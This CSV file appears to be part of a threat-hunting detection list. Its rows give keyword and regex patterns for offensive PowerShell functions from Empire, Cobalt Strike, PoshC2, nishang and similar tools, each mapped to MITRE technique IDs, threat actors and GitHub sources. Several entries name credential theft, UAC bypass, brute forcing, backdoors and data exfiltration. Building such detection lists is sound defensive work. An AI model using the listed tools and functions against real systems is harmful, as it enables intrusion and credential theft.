"*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48867"
"*invoke-bloodhound*",".{0,1000}invoke\-bloodhound.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48868"
"*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48869"
"*Invoke-Bloodhound.ps1*",".{0,1000}Invoke\-Bloodhound\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","48870"
"*Invoke-Bof *",".{0,1000}Invoke\-Bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","48871"
"*Invoke-Bof.ps1*",".{0,1000}Invoke\-Bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","48872"
"*Invoke-Boolang.ps1*",".{0,1000}Invoke\-Boolang\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48873"
"*Invoke-BruteAvailableLogons*",".{0,1000}Invoke\-BruteAvailableLogons.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48874"
"*Invoke-BruteClientIDAccess*",".{0,1000}Invoke\-BruteClientIDAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Test different client_id's against MSGraph to determine permissions","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48875"
"*Invoke-BruteForce*",".{0,1000}Invoke\-BruteForce.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48876"
"*Invoke-BruteLogonAccount*",".{0,1000}Invoke\-BruteLogonAccount.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48877"
"*Invoke-BruteLogonList*",".{0,1000}Invoke\-BruteLogonList.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48878"
"*Invoke-BSOD*",".{0,1000}Invoke\-BSOD.{0,1000}","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","N/A","3","298","70","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z","48879"
"*Invoke-BSOD.ps1*",".{0,1000}Invoke\-BSOD\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48880"
"*Invoke-BuildAnonymousSMBServer -*",".{0,1000}Invoke\-BuildAnonymousSMBServer\s\-.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","N/A","6","3","229","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z","48881"
"*Invoke-BuildAnonymousSMBServer.ps1*",".{0,1000}Invoke\-BuildAnonymousSMBServer\.ps1.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","N/A","6","3","229","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z","48882"
"*Invoke-BypassUAC -Command *",".{0,1000}Invoke\-BypassUAC\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48883"
"*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48884"
"*Invoke-BypassUAC.ps1*",".{0,1000}Invoke\-BypassUAC\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48885"
"*Invoke-BypassUACTokenManipulation*",".{0,1000}Invoke\-BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48886"
"*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48887"
"*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48888"
"*Invoke-Carbuncle*",".{0,1000}Invoke\-Carbuncle.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48889"
"*Invoke-Cats -pwds*",".{0,1000}Invoke\-Cats\s\-pwds.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48890"
"*Invoke-Cats.ps1*",".{0,1000}Invoke\-Cats\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48891"
"*Invoke-CcmNaaCredentialsCheck*",".{0,1000}Invoke\-CcmNaaCredentialsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48892"
"*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48893"
"*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48894"
"*Invoke-CheckAccess*",".{0,1000}Invoke\-CheckAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Check if tokens are valid","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48895"
"*Invoke-CheckLocalAdminAccess -ComputerName *",".{0,1000}Invoke\-CheckLocalAdminAccess\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48896"
"*invokechecklocaladminaccess*",".{0,1000}invokechecklocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48897"
